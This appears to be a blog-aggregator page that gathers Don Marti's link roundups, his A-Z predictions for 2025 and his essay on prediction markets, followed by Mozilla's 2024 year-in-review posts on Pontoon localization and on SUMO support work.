Simon Willison says, I still don’t think companies serve you ads based on spying through your microphone. For the accusation to be true, Apple would need to be recording those wake word audio snippets and transmitting them back to their servers for additional processing (likely true), but then they would need to be feeding those snippets in almost real time into a system which forwards them onto advertising partners who then feed that information into targeting networks such that next time you view an ad on your phone the information is available to help select the relevant ad. That is so far fetched. He’s totally right if you define your microphone as the microphone on your cell phone, which has limited battery energy and bandwidth. But most people own microphones, plural, and a smart TV or kitchen appliance is typically plugged in so the juice to process ambient audio for keywords is there.

Bonus links

In The long goodbye for Tim Cook, Manton Reece writes, Tim Cook gives $1 million to Trump’s inauguration committee. I think this event will be a turning point in how we view the Apple CEO. (imho the real turning point was the saga with the Chaos Monkeys guy. Cook intended to hire a high-profile former Facebook exec, and when it didn’t work he got surveillance-bro-pilled. Related: turn off advertising measurement in Apple Safari. Maybe if people are mad at Apple now, mice would like the VR goggles thing better?)

Chris Castle has a must-read update on Social Media Addiction Multidistrict Litigation–the return of Joe Camel in the sleeper case that could break Silicon Valley. Yes, the Big Tech companies filed a motion to dismiss because Section 230, but it was granted in part and denied in part (PDF). Here’s the case site: In re: Social Media Adolescent Addiction/Personal Injury Products Liability Litigation (MDL No. 3047) | United States District Court, Northern District of California

Dean W. Ball covers the Texas Responsible AI Governance Act in Texas Plows Ahead. (This bill doesn’t have a national defense exception the way the EU’s AI Act does, which is strange.)

I’m looking forward to the new Charles Stross novel that past me thoughtfully pre-ordered from Books Inc. for near future me. In A Conventional Boy a man was sentenced to prison for playing Dungeons and Dragons in the 1980s, and many years later he’s putting his escape plan into action…

Don MartiLinks for 4 Jan 2025: news from the low-trust society

Aram Zucker-Scharff writes, in Never Forgive Them,

If this year has revealed anything about the tech billionaires it is that they have a very specific philosophy other than just growth and that philosophy is malicious…I don’t think we can really take on the obstacle of, let’s call it more accurately, the scam economy without acknowledging this is all part of the design. They think they are richer than you and therefore you must be stupid and because you are stupid you should be controlled…

Read the whole thing. A lot of tech big shots want to play the rest of us like a real-time strategy game. (Ever notice that the list of skills in the we don’t hire US job applicants because the culture doesn’t value the following skills tweets is the same as the list of skills in the our AI has achieved human-level performance in the following skills tweets?) I predicted that low-trust society will trend in 2025, and I agree with Aram that a big part of that is company decision-makers deliberately making decisions that make it harder to trust others. I’m working on a list of known good companies. (Work in progress, please share yours if you have one.)

And yes, my link collecting tool as queued up a bunch of links about the shift towards a lower-trust society along with ways that people are adapting to it or trying to shift things back.

Opinion: We Need More Consequences for Reckless Driving. But That Doesn’t Mean More Punishment — Streetsblog USA (a lot of this is reactions to reactions to app-driven rat running through neighborhoods. Bollards can be a way to game the algorithm.)

Judge blocks parts of California bid to protect kids from social media (the ban on addictive feeds without consent is still there)

Self-Own (bullshit about economics, explained)

The Cows in the Coal Mine (bullshit about health, only getting worse)

This Year in Worker Conquests

Boeing strike ends after workers vote to accept “life-changing” wage increase

Steinar H. Gunderson: git.sesse.net goes IPv6-only (coping with AI scrapers)

OpenAI’s Board, Paraphrased: ‘To Succeed, All We Need Is Unimaginable Sums of Money’

Namma Yatri is a rideshare app that offers a better deal to drivers. Daily or per-trip flat rates, not a percentage

5 Rideshare Strategies That Are Complete BS

How to block Chrome from signing you into a Google account automatically

Leave Me Alone.

Firefox-maker Mozilla’s boosted revenue significantly in 2023, but the financial report may also raise concern

Google Cuts Thousands of Workers Improving Search After Search Results Scientifically Shown to Suck (a lot of the bullshit problem is downstream from Google’s labor/management issues)

Why is it so hard to buy things that work well? (imho Mark Ritson still explained it best—companies over-emphasize the promotion P of marketing, trying to find people slightly more likely to buy the product as is, over the product refinements that would tend to get more buyers. George Tannenbaum on destroying brand trust with too much of one P, too little of another: Ad Aged: Leave Me Alone.)

Why Big Business May Wind Up Missing Lina Khan

An ad giant wants to run your next TV’s operating system

Yes, your phone is tracking you via advertising ID, and companies are using it to sell your location and identity to anyone. Protect yourself by disabling this feature on your device.

Meta beats suit over tool that lets Facebook users unfollow everything (I guess now it turns out you can’t unfollow the AI bots anyway?)

Sweet Dreams and Sour Deals: How White-Noise Apps Are Playing Advertisers

NFL Player Uses Pirate Streaming Site to Watch His Own Team

Missouri AG claims Google censors Trump, demands info on search algorithm

Ex-coiner Y Combinator startup bro: ‘dawg i chatgpt’d the license, can’t be bothered with legal’

Steam adds the harsh truth that you’re buying “a license,” not the game itself

Mozilla Localization (L10N)Mozilla Localization in 2024

A Year in Data

2024 was a year with plenty of achievements for the Mozilla localization community (here’s the 2023 report in case you missed it, or want to check how we fared against our original plans). Let’s start with the numbers first:

  • 30 projects (-2 compared to last year) and 369 locales (+111) set up in Pontoon.
  • 4,991 new user registrations
  • 1,202 active users, submitting at least one translation (on average 222 users per month)
  • 466,187 submitted translations
  • 385,722 approved translations
  • 20,931 new strings to translate

While the overall number of projects decreased, this is mostly due to removal of obsolete projects (we actually added a new one in November). The astounding increase in the number of locales is driven once again by Common Voice, which has 318 locales enabled in Pontoon.

Thank you to all the volunteers who contributed their time, passion, and expertise to Mozilla’s localization over the last 12 months.

Pontoon Development

At the start of the year, we focused on improving Pontoon’s performance — a less glamorous but essential part of maintaining an effective platform: if the platform doesn’t perform well, users can quickly lose motivation and stop contributing. To assess the current state, we used the Apdex score, a standard measure of user satisfaction for web application performance. Between January and March, we successfully raised the average score for our lowest performing transactions from 0.77 to 0.87, making significant progress toward achieving what is considered a “good” performance level. Later in the year, we also moved to a larger database plan to further improve performance.

Animated GIF showing Pontoon's LLM integration in the machinery tab.In May, we launched our first LLM integration. Users now have additional options if they’re not satisfied with the suggestion provided by Google Translate. They can choose from three actions: Rephrase, to generate an alternative version; Make formal, to adjust the tone to a more formal register; and Make informal, to create a more casual version. These options are especially valuable for languages like German or Spanish, where tone can significantly impact translation quality and consistency.

Between May and December 2024, this feature has been used 2,571 times across 69 locales, with approximately 35% of the generated text being copied into the editor. This adoption rate suggests that the feature is delivering good-quality results and meeting user needs effectively, and that we should look into expanding its use.

Screenshot of Pontoon advanced search options.In October, we introduced advanced search options, giving users more flexibility and precision in finding the content they need. By default, Pontoon now searches through source text, approved translations, and pending suggestions. However, users still retain the option to expand their search to include identifiers, rejected translations, or further refine results by matching case or whole words.

For more details on how to use this feature, check out our documentation. We’re currently analyzing the usage data to understand if we should change the default options, and exploring how to make the feature more discoverable.

Screenshot of translation memory management in PontoonDecember was an especially busy month for releasing new features. We kicked things off with the long-awaited ability to edit translation memory (TM) entries, addressing one of the most frequently requested enhancements from our users. Shortly after, we introduced another powerful feature: the ability to upload custom translation memories in TMX format, giving locales even more control over their localization workflows.

Image showing achievement badges available in Pontoon.We also launched our first glimpse of gamification! Users can now earn three different types of badges for translating, reviewing, and promoting other contributors. The goal isn’t just to recognize and celebrate the invaluable efforts of volunteers but also to encourage positive behaviors. These include reviewing others’ work and promoting promising contributors, helping communities grow and encouraging effective participation across the platform.

Available user banners in Pontoon.As part of this work we also introduced user banners to help clarify roles within a locale or project.

Finally, we wrapped up the year by enhancing Pontoon’s ability to keep users informed. Users can now opt to receive notifications via email, choosing between daily or weekly updates. Additionally, we introduced a Monthly Activity Summary — a digest that highlights both their personal contributions and their team’s activity. If you’re a locale manager, we highly recommend enabling this feature to stay on top of your community’s progress and engagement.

Email options in Pontoon's profile settings.If you check your settings, you’ll find a new option for News and Updates. We highly encourage users to enable this checkbox to stay informed about online events, new features, surveys, and more. The content will be strictly focused on Mozilla Localization and Pontoon, and you can opt out or change your preferences at any time.

Lastly, a lot of work happened behind the scenes to improve Pontoon’s functionality and stability. We introduced the Messaging Center, a new feature that enables program managers to communicate with users more effectively through targeted notifications or emails.

In addition, we’ve been rewriting the code responsible for syncing Pontoon with repositories. This foundational work lays the groundwork for a broader set of initiatives planned for 2025. We also implemented measures to mitigate DDoS attacks, ensuring the platform remains stable, secure, and reliable for all users.

Community

This year, we collaborated with members of the community and other community-focused teams at Mozilla to improve our existing documentation and create comprehensive community guidelines aimed at building vibrant and sustainable communities. These guidelines address key topics, such as the expectations for managers and translators, and provide clear processes for assigning permissions to new contributors when existing leaders are not available.

Unfortunately, the situation around in-person community events hasn’t changed. We know how important these gatherings are for you — and for us — but in the meantime, we continued to focus on organizing online events. You can find all the recordings for the 2024 events here. We’ve also recorded an Introduction to Pontoon, designed to help onboard new contributors and familiarize them with the platform.

What’s coming in 2025

While we made significant strides in improving Pontoon’s performance this year, we believe that we’ve reached the limits of our current setup. As we move into the new year, our focus will shift to exploring alternative deployment solutions. Our goal is to make Pontoon faster, more reliable, and better equipped to meet the needs of our users.

We aim to make mobile projects (Android and iOS) first-class citizens in our localization ecosystem. The first step is introducing support for plural forms, which will significantly enhance the localizability of these projects. This improvement will enable more natural-sounding content in English and other languages, ensuring a better experience for both contributors and end users.

Talking about Pontoon, we’re committed to improving translation memory utilization, particularly for handling multi-value strings commonly found in Fluent. Currently, Pontoon only suggests translations for a single value within these strings. Moving forward, we aim to provide suggestions or translation memory matches for entire strings, ensuring a more comprehensive and efficient translation experience.

We plan to work on a Mozilla Language Portal — a unified hub that highlights Mozilla’s unique approach to localization while serving as a comprehensive resource for translators. This webpage will feature searchable translation memories, a rich repository of documentation, best practices, blogs, and more, fostering knowledge-sharing and collaboration across the global translation community.

Finally, we will continue exploring innovative ways to engage our community and strengthen its connections. As part of this work, we will keep advocating for increased investment in community building at the organization level, emphasizing its critical role in driving our mission forward.

If you have any thoughts or ideas about this plan, let us know on Mastodon or Matrix!

Thank you!

As we step into 2025, we’re constantly reminded of the transformative power of localization. Together, we’ll continue to break down barriers, and create a digital world that speaks everyone’s language. Thank you for being part of this journey.

Don Martipredictions for 2025

(looks like I had enough notes for an upcoming event to do A-Z this year…)

Ad blocking will get bigger and more widely reported on. Besides the usual suspects, the current wave of ad blocking is also partly driven by professional, respectable security vendors. Malwarebytes Labs positions their ad blocker as an security tool and certain well-known companies are happy to help them with their content marketing by running malvertising. (example: Malicious ad distributes SocGholish malware to Kaiser Permanente employees) Silent Push is another security vendor helping to make the ads/malware connection. And, according to research by Lin et al., users who installed an ad blocker reported fewer regrets with purchases and an improvement in subjective well-being. Some of those users who installed an ad blocker reluctantly because of security concerns will be hard to convince to turn it off even if the malvertising situation improves.

Bullshit is going to be everywhere, and more of it. In 2025 it won’t be enough to just ignore the bullshit itself. People will also have to ignore what you might think of as a bullshit Smurf attack, where large amounts of content end up amplifying a small amount of bullshit. Some politician is going to tweet something about how these shiftless guys today need to pull up their pants higher, and then a bunch of mainstream media reporters are going to turn in their diligently researched 2000-word think pieces about the effect of higher pants on the men’s apparel market and human reproductive system. And by the time the stories run, the politician has totally forgotten about the pants thing and is bullshitting about something else. The ability to ignore the whole cycle will be key. So people’s content discovery habits are going to change, we just don’t know how.

Chrome: Google will manage to hang on to their browser, as prospective buyers don’t see the value in it. Personally I think there are two logical buyers. The Trade Desk could rip out the janky Privacy Sandbox stuff and put in OpenPass and UID2. Not all users would leave those turned on, but enough would to make TTD the dominant source for user identifiers in web ads. Or a big bank could buy Chrome as a fraud protection play and run it to maximize security, not just ad revenue. At the scale of the largest banks, protecting existing customers from Internet fraud would save the bank enough money to pay for browser development. Payment platform integration and built-in financial services upsell would be wins on top of that.

Both possible Chrome buyers would be better off keeping open-source Chromium open. Google would keep contributing code even if they didn’t control the browser 100%. They would feel the need to hire or sponsor people to participate on a legit open-source basis to support better interoperability with Google services. They wouldn’t be able to get the anticompetitive shenanigans back in, but the legit work would continue—so the buyer’s development budget would be lower than Google’s, long term. But that’s not going to happen. So far, decision makers are convinced that the only way to make money with the browser is with tying to Google services, so they’re going to pass up this opportunity.

Development tools will keep getting more AI in them. It will be easier to test new AI stuff in the IDE than to not test it. But a flood of plausible-looking new code that doesn’t necessarily work in all cases or reflect the unwritten assumptions of the project means a lot more demand for testing and documentation. The difference between a software project that spends 2025 doing self-congratulatory AI productivity win blog posts and one that has an AI code catastrophe is going to be how much test coverage they started with or were able to add quickly.

Environmental issues: we’re in for more fires, floods, and storms. Pretty much everybody knows why, but some people will only admit it when they have to. A lot of homeowners won’t be able to renew their insurance, so will end up selling to investors who are willing to demolish the house and hold the land for eventual resale. More former house occupants will pivot to #vanlife, and 24-hour health clubs will sell more memberships to people who mainly need the showers.

Firefox will keep muddling through. There will be more Internet drama over their ill-advised adfraud in the browser thing, but the core software will be able to keep going and even pick up a few users on desktop because of the ad blocking trend. The search ad deal going away won’t have much effect—Google pays Firefox to exist and limit the amount of antitrust trouble it’s in, not for some insignificant number of search ad clicks. If they can’t pay Firefox for default search engine placement, they’ll find some other excuse to send them enough cash to keep going. Maybe not as high on the hog as they have been used to, but enough to keep the browser usable.

Google Zero, where Google just stops sending traffic to a site, will arrive for a significant minority of sites. But not even insiders at Google know which. (I Attended Google’s Creator Conversation Event, And It Turned Into A Funeral | GIANT FREAKIN ROBOT, Google, the search engine that’s forgotten how to search)

Homeschooling will increase faster because of safety concerns, but parents will feel uncomfortable about social isolation and seek out group activities such as sports, crafts, parent-led classes, and group playdates. Homeschoooling will continue to be a lifestyle niche that’s relatively easy to reach with good influencer and content creator connections, but not well-covered by the mainstream media.

Immigration into the USA will continue despite high-profile deportations and associated human rights violations. But whether or not a particular person is going to be able to make it in, or be able to stay, is going to be a lot less predictable. If you know who the person is who might be affected by immigration policy changes, you might be able to plan around it, but what’s more likely from the business decision-making point of view is the person affected is an employee of some supplier of your supplier, or a family member, and you can’t predict what happens when their life gets disrupted. Any company running in lean or just-in-time mode, and relying on low disruption and high predictability, will be most at a disadvantage. Big Tech companies will try to buy their way out of the shitstorm, but heavy reliance on networks of supplier companies will mean they’re still affected in hard-to-predict ways.

Journalism will continue to go non-profit and journalist-owned. The bad news is there’s not enough money in journalism, now or in the near future, to sustain too many levels of managers and investors, and the good news is there’s enough money in it to keep a nonprofit or lifestyle company going. (Kind of like tech conferences. LinuxWorld had to support a big company, so wasn’t sustainable, but Southern California Linux Expo, a flatter organization, is.)

Killfile is the old Usenet word for a blocklist, and I already had something for B. The shared lists that are possible with the Fediverse and Bluesky are too useful not to escape into other categories of software. I don’t know which ones yet, but a shared filter list to help fix the search experience is the kind of thing we’re likely to see. People’s content discovery and shopping habits will have to change, we just don’t know how.

Low-trust society will trend. It’s possible for a country to move from high trust to low, or the other way around, as the Pew Research Center covered in 2008. The broligarchy-dominated political and business environment in the USA, along with the booms in growth hacking and AI slop, will make things a lot easier for corporate crime and scam culture. So people’s content discovery and shopping habits will have to change, we just don’t know how. Multi-national companies that already operate in middle-income low-trust countries will have some advantages in figuring out the new situation, if they can bring the right people in from there to here.

Military affairs, revolution in: If you think AI hype at the office in the USA is intense, just watch the AI hype in Europe about how advanced drones and other AI-enabled defense projects can protect countries from being occupied by an evil dictator without having to restore or expand conscription. Surveillance advertisers and growth hackers in the USA are constantly complaining about restrictions on AI in Europe—but the AI Act over there has an exception for the defense industry. In 2025 it will be clear that the USA is over-investing in bullshit AI and under-investing in defense AI, but it won’t be clear what to do about it. (bonus link: The Next Arsenal of Democracy | City Journal)

Neighborhood organizations: As Molly White recommended in November, more people will be looking for community and volunteer opportunities. The choice to become a joiner and not just a consumer in unpredictable times is understandable and a good idea in general. This trend could enter a positive feedback loop with non-profit and journalist-owned local news, as news sites try more community connections like Cleveland Documenters.

Office, return to: Companies that are doing more crime will tend to do more RTO, because signaling loyalty is more important than productivity or retaining people with desired skills. Companies that continue avoiding doing crimes, even in what’s going to be a crime-friendly time in the USA, will tend to continue cutting back on office space. The fun part is that the company can tell the employee that work from home privileges are a benefit, and not free office space for the employer. Win-win! So the content niche for how-tos on maximizing home (and van) offices will grow.

Prediction markets will benefit from 2024’s 15 minutes of fame to catch on for some niche corporate projects, and public prediction market prices will be quoted in more news stories.

Quality, flight to (not): If I were going to be unrealistically optimistic here, I’d say that the only way for advertisers to deal with the flood of AI slop sites and fake AI users is to go into full Check My Ads mode and just advertise on known legit sites made by and for people. But right now the habits and skills around race-to-the-bottom ad placements are too strong, so there won’t be much change on the advertiser side in 2025. A few forward-thinking advertisers will get good results from quality buying for specific campaigns, but that’s about it.

Research on user behavior will get a lot more important. The AI crapflood and resulting search quality crisis mean that (say the line, Bart) people’s content discovery and shopping habits will have to change, we just don’t know how. Companies that build user research capacity, especially in studying privacy users and the gaps they leave in the marketing data, will have an advantage.

State privacy law season will be spicy again. A few states will get big comprehensive privacy bills through the process again, but the laws to watch will be specific ones on health, protecting teens from the algorithm, social media censorship, and other areas. More states will get laws like Daniel’s Law. (We need a Daniel’s Law for military personnel, their families, and defense manufacturing workers, but we’re probably going to see some states do them for health insurance company employees instead.)update 1 Feb 2025: Compliance issues that came up for AADC will have to get another look.

Troll lawyer letters alleging violations of the California Invasion of Privacy Act (CIPA) and similar laws will increase. Operators of small sites can incur a lot of legal risk now just by running a Big Tech tracking pixel. But Big Tech will continue to ignore the situation, and put all the risks on the small site. (kind of like how Amazon.com uses delivery partner companies to take the legal risks of employing algorithmically micromanaged, overstressed delivery drivers.)

Unemployment and underemployment will trend up, not down, in 2025. Yes, there will be more political pressure on companies here to hire and manufacture locally, but actual job applicants aren’t interchangeable worker units in an RTS game—there’s a lot of mismatch between the qualities that job seekers will have and the qualities that companies will be looking for, which will mean a lot of jobs going unfilled. And employers tend to hire fewer people in unpredictable times anyway.

Virginia’s weak privacy law will continue to be ignored by most companies that process personal data. Companies will treat all the privacy law states as Privacyland, USA which means basically California.

Why is my cloud computing bill so high? will be a common question. But the biggest item on the bill will be the AI that [employee redacted] is secretly in love with, so you’ll never find it.

X-rated sites will face an unfriendly regulatory environment in many states, so will help drive mass-market adoption of VPNs, privacy technologies, cryptocurrencies, and fintech. The two big results will be that first, after people have done all the work to go underground to get their favorite pr0n site, they might as well use their perceived invisibility to get infringing copies of other content too. And second, a lot of people will get scammed by fake VPNs and dishonest payment services.

Youth privacy laws will drive more investment in better content for kids. (This is an exception to the Q prediction.) We’re getting a bunch of laws that affect surveillance advertising to people under 18. As Tobias Kircher and Jens Foerderer reported, in Ban Targeted Advertising? An Empirical Investigation of the Consequences for App Development, a privacy policy change tended to drive a lot of Android apps for kids out of the Google Play Store, but the top 10 percent of apps did better. If you have ever visited an actual app store, it’s clear that Sturgeon’s law applies, and it’s likely that the top 10 percent of apps account for almost all of the actual usage. All the kids privacy laws and regs will make youth-directed content a less lucrative play for makers of crap and spew who can make anything, leaving more of the revenue for dedicated and high-quality content creators.

ZFS will catch on in more households, as early adopters replace complicated streaming services (and their frequent price increases and disappearing content) with storage-heavy media PCs.

Don MartiHow we get to the end of prediction market winter

Taylor Lorenz writes, in Prediction markets go mainstream,

Prediction markets—platforms where users buy and sell shares based on the probability of future events—are poised to disrupt the media landscape in 2025, transforming not only how news is shared but how it is valued and consumed.

Prediction markets did get some time in the spotlight this year. But the reasons for the long, ongoing prediction market winter are bigger than just prediction markets not being famous. Prediction markets have been around for a long time, and have stubbornly failed to go mainstream.

The first prediction market to get famous was the University of Iowa’s Iowa Electronic Markets which launched in the late 1980s and has been covered in the Wall Street Journal since at least the mid-1990s. They originally used pre-web software and you had to mail in a paper check (update 4 Jan 2024: paper checks are still the only way to fund your account on there). But IEM wasn’t the first. Prof. Robin Hanson, in Hail Jeffrey Wernick, writes about an early prediction market entrepreneur who started his first one in 1981. (A secretary operated the market manually, with orders coming in by fax.) Prediction markets were more famous than Linux or the World Wide Web before Linux or the World Wide Web. Prediction markets have been around since before stop trying to make fetch happen happened.

So the safe prediction would be that 2025 isn’t going to be the year of prediction markets either. But just like the year of Linux on the desktop never happened because the years of Linux in your pocket and in the data center did, the prediction markets that do catch on are going to be different from the markets that prediction market nerds are used to today. Some trends to watch are:

Payment platforms: Lorenz points out, Prediction markets are currently in legal limbo, but I’d bet against a ban, especially given the new administration. Right now in the USA there is a lot of VC money tied up in fintech, and a lot of political pressure from well-connected people to deregulate everything having to do with money. For most people the biggest result will be more scams and more hassles dealing with transactions that are legal and mostly trustworthy today but that will get enshittified in the new regulatory environment. But all those money-ish services will give prediction markets a lot more options for getting money in and out in a way that enables more adoption.

Adding hedging and incentivization: The prediction markets that succeed probably won’t be pure, ideal prediction markets, but will add on some extra market design to attract and retain traders. Nick Whitaker and J. Zachary Mazlish, in Why prediction markets aren’t popular, write that so far, prediction markets don’t appeal to the kinds of people who play other kinds of markets. People enter markets for three reasons. Savers are trying to build wealth, Gamblers play for thrills, and Sharps enter to profit from less well-informed traders. No category out of the three is well-served by existing prediction markets, because a prediction market is zero-sum, so not a way to build wealth long-term, and it’s too slow-moving and not very thrilling compared to other kinds of gambling. And the sharps need a flow of less well informed traders to profit from, but prediction markets don’t have a good way to draw non-sharps into the market.

Whitaker and Mazlish do suggest hedging as a way to get more market participants, but say

We suspect there is simply very little demand for hedging events like whether a certain law gets passed; there is only demand for hedging the market outcomes those events affect, like what price the S&P 500 ends the month at. Hedging market outcomes already implicitly hedges for not just one event but all the events that could impact financial outcomes.

That’s probably true for hedging in a large public prediction market. An existing oil futures market is more generally useful to more traders that a prediction market on all the events that might affect the price of oil. And certain companies’ stocks today are largely prediction markets on future AI breakthroughs and the future legal status of various corporate crimes. But I suspect that it’s different for a private market for events within a company or organization. For example, a market with sales forecasting contracts on individual large customers could provide much more actionable numbers to management than just trading on predicted total sales.

You could, in effect, pay for a prediction market’s information output by subsidizing it, and Whitaker and Mazlish suggest this. A company that runs an internal prediction market can dump money in and get info out. Like paying for an analyst or consulting firm, but in a distributed way where the sources of expertise are self-selecting by making trade/no trade decisions based on what they know or don’t know. But it’s also possible, usually on the smaller side, for a prediction market to become an incentivization market. To me, the difference is that in an incentivization market, a person with ability to affect the results holds a large enough investment in the market that it influences them to do so. The difference is blurry and the same market can be a prediction market for some traders and an incentivization market for others. But by designing incentives for action in, a market operator can make it drift away from a pure prediction market design to one that tends to produce an outcome. related: The private provision of public goods via dominant assurance contracts by Alexander Tabarrok

Proof of concept projects can already address specific information needs: A problem that overlaps with the prediction market incentivization problem in interesting ways is the problem of how to pay for information products and services that can be easily copied. How do we fund open source? is a persistent question. And Bruce Perens, original author of what became the Open Source Definition, wants to move on entirely. The problem of funding open source is hard enough that we mainly hear about it when a high-profile security issue makes the news.

As Luis Villa points out,

If you don’t know what’s in the box, you can’t secure it, so it is your responsibility as builders to know what’s in the box. We need better tools, we need better engagement to enable everybody to do that with less effort and less burden on individual volunteer maintainers and non-profits.

Companies that use open source software need to measure and reduce risks. The problem is that the biggest open source risks are related to hard-to-measure human factors like developer turnover and burnout. Developers of open source software can take actions that help companies understand their risks, but they’re not compensated for doing it. A prediction/incentivization market can both help quantify hidden risks and incentivize changes.

If you have an internal market that functions as both a prediction market and an incentivization market, you can subsidize both the information and the desired result by predicting the events that you don’t want to happen. This is similar to how commodities markets and software bug futures markets can work. Some traders are pure speculators, others take actions that can move the market. Farmers can plan which crops to plant based on predicted or contracted prices, companies can allocate money to fuel futures and/or fuel-saving projects, developers can prioritize tasks.

Synergy with AI projects: An old corporate Intranet rule of thumb [citation needed] is that you need five daily active editors to have a useful company or organization Wiki. I don’t know what the number is for a prediction market, but as Prof. Andrew Gelman points out, prediction markets need “dumb money” to create incentives for well-informed traders to play and win.

Noisy, stupid bots are a minus for most kinds of social software, but a win for markets. If only there were some easy way to crank up a bunch of noisy, stupid bots. Oh, wait, there’s a whole AI boom happening. Good timing, right? And AI projects need ways to test their output quality in a scalable way, just as much as prediction markets need extra trading churn. AI projects and prediction market projects solve each other’s problems.

  • Prediction markets need liquidity and dumb money. Bots can already do those.

  • AI projects need scalable quality checks. Slop is easier to make than to check, so evaluating the quality of AI output keeps growing relative to the declining costs of everything else. You can start up a lot of bots, fund each with a small stake, and shut down the broke ones. The only humans required are the traders who can still beat the bots. and if at some point the humans lose all their money, you know you won AI. Congratulations, and I for one welcome our bot plutocrat overlords.

Bots can also be run behind a filter to only make offers that, if accepted, would further the market operator’s goals in some way. For example, bots can be set up to be biased to over-invest on predicting unfavorable outcomes (like buying the UNFIXED side of bug futures) to add some incentivization.

Fixing governance by learning from early market experiences: Internal prediction markets at companies tend to go through about the same story arc. First, the market launches with some sponsorship and internal advocacy from management. Second, the market puts up some encouraging results. (Even in 2002 a prediction market was producing more accurate sales forecasts than the official ones at HP.) And for its final act, the prediction market ends up perpetrating the unforgivable corporate sin: accurately calling some powerful executive’s baby ugly. So the prediction market ends up going to live with a nice family on a farm. Read the (imho, classic) paper, Corporate Prediction Markets: Evidence from Google, Ford, and Firm X by Bo Cowgill and Eric Zitzewitz, and, in Professor Hanson’s post, why a VC firm could not get prediction markets into portfolio companies. Wernick blames the ego of managers who think their judgment best, hire sycophants, and keep key org info close to their chests.

The main lesson is that the approval and budget for the prediction market itself needs to be handled as many management levels as possible above the managers that the prediction market is likely to bring bad news to. Either limit the scope of issues traded on, or sell the market to a more highly placed decision maker, or both. The prediction market administrator needs to report to someone safely above the level of the decision-makers for the issues being traded on. The really interesting experiment would be a private equity or VC firm that has its own team drop in and install a prediction market at each company it owns. The other approach is bottom-up: start with limiting the market to predicting small outcomes like the status of individual software bugs, and be disciplined about not trading on more consequential issues until the necessary sponsorship is in place.

So, is 2025 the year of prediction markets? Sort of. A bunch of factors are coming together. Payment platform options, the ability to do proof of concept niche projects, and the good fit as a QA tool for AI will make internal market projects more appealing in 2025. And if market operators can learn from history to avoid what tends to happen to bearers of bad news, this could be the year.

Related

From prediction markets to info finance by Vitalik Buterin

Conditional market: The seer.io prediction market supports conditional positions (that only win or lose if some other position pays off) with an arbitrary number of nesting levels.

Polymarket Explained: How Blockchain Prediction Markets Are Shaping the Future of Forecasting Pavel Naydanov explains implementation details. (An internal prediction market can be a relatively simple CRUD app, though, so lack of this technology was not really holding prediction markets back.)

Bonus links

The History Crisis Is a National Security Problem Democracies such as the United States rely on the public to set broad strategic priorities through elections and on civilian leaders to translate those priorities into executable policies. Fostering historical knowledge in the public at large is also an important aspect of U.S. competitiveness. (and we really don’t want to be learning about history from bots)

Why the deep learning boom caught almost everyone by surprise Fei-Fei Li….created an image dataset that seemed ludicrously large to most of her colleagues. But it turned out to be essential for demonstrating the potential of neural networks trained on GPUs.

“Unprecedented” decline in teen drug use continues, surprising experts (maybe the kids are addicted to video games now?)

Developing a public-interest training commons of books Currently, AI development is dominated by a handful of companies that, in their rush to beat other competitors, have paid insufficient attention to the diversity of their inputs, questions of truth and bias in their outputs, and questions about social good and access. Authors Alliance, Northeastern University Library, and our partners seek to correct this tilt through the swift development of a counterbalancing project…

Support.Mozilla.OrgWrapping up 2024: How SUMO made support smarter, simpler, and more accessible

As 2024 comes to a close, we want to take a moment to celebrate the work we’ve accomplished together at Mozilla Support (SUMO). This year, we focused on making support resources easier to use, smarter to create, and better for everyone. From reducing users’ cognitive load to amplifying their voices through new programs, these wins are a testament to collaboration between our team, contributors, and the wider Mozilla community.

Let’s look back at the highlights.

Making support simpler for everyone

This year, we successfully kicked off the Cognitive Load Reduction initiative. The goal was clear: make Knowledge Base articles easier to follow and less mentally demanding for users. We introduced several improvements, including:

Right now, SUI screenshots and inline icons and images are the most widely adopted updates. These visual additions have already made a noticeable difference in helping users understand and solve issues faster. Next year, we will continue expanding these improvements to reach even more articles and provide a smoother experience for everyone.

One unified taxonomy to connect the dots

Another big milestone this year was the creation and implementation of a unified taxonomy across Mozilla’s Customer Experience team. A unified taxonomy is a shared structure for classifying things — in our case, everything from knowledge base content to app store feedback and user insights.

Here’s why it matters: With this new system, we can gather consistent and meaningful data about what our users need most. Whether it’s feedback about Firefox in app stores or trends in KB article usage, we’re now able to connect the dots between different channels. This deeper understanding helps us improve Mozilla’s products and continuously refine our support resources to be more useful and relevant.

Amplifying user voices with the Voice of Customer program

This year, we launched our Voice of Customer (VoC) program to ensure the voices of our users are consistently heard across Mozilla. We’re gathering feedback from multiple channels — like app store reviews, Connect, SUMO forums, and surveys — and sharing these insights with the teams that shape Mozilla’s products and support resources

To take this program even further, we’re customizing our own Gen-AI model to help cross-check user feedback across channels. This will allow us to identify trends more effectively and ensure the insights we share are accurate and actionable. By better connecting what users are saying with what we’re building, we can make Mozilla’s products and our support efforts even more aligned with user needs.

This is an ongoing effort, and we’re excited to see its continued impact in the coming year.

AI tools that make content smarter (and more accessible)

This year, we also explored how AI can improve the way we create, update, and localize content. Two major initiatives have already begun delivering results:

Organa Oracle for content creation and review

Organa Oracle is a custom GPT model built in Mozilla’s OpenAI Workspace, specifically designed to support SUMO’s style, voice, and guidelines. It helps streamline the creation and updating of Knowledge Base articles by:

  • Suggesting formats and approaches that align with SUMO guidelines.
  • Recommending screenshots and generating alt text to keep articles accessible to all users.
  • Reviewing drafts for clarity, tone, and consistency to ensure every article meets our standards.

For now, Organa Oracle is available only to staff, but we’re actively exploring ways to bring it and other similar tools to contributors in the future. These tools could make content creation and updates faster, easier, and even more collaborative while still reflecting the high quality and accessibility users expect from SUMO.

AI-powered L10N

At the same time, we’re using top large language models (LLMs), like Google’s Gemini and OpenAI’s ChatGPT-4o, with carefully designed prompts to assist in the localization process. These tools are built to respect existing translations while improving consistency and efficiency, especially in locales where fewer contributors are active. This initiative is designed to fill in gaps, improve consistency, and make localization more efficient for everyone.

Here’s what’s important: contributors will always be at the heart of our localization efforts. AI-powered localization is designed to support and amplify your work, not replace it. By speeding up the process and filling in gaps, the AI will help ensure more consistent translations and give contributors more time to focus on fine-tuning and reviewing content.

Together, these AI-driven tools are helping us create smarter, more accessible content and ensure users worldwide get the support they need.

Why this matters: Mozilla’s mission in action

At Mozilla, our work is guided by the Mozilla Manifesto, a promise to build an open and accessible internet that puts people first. Every initiative we worked on this year reflects that mission:

  • Reducing cognitive load makes support resources more inclusive, helping people of all skill levels solve problems with ease.
  • The Voice of Customer program ensures that user feedback actively shapes Mozilla’s products and support efforts.
  • Organa Oracle and our localization AI make content creation and translation faster while keeping accessibility, quality, and human collaboration at the center.

By simplifying and improving how we support users, we’re making it easier for everyone to feel confident and empowered on the web.

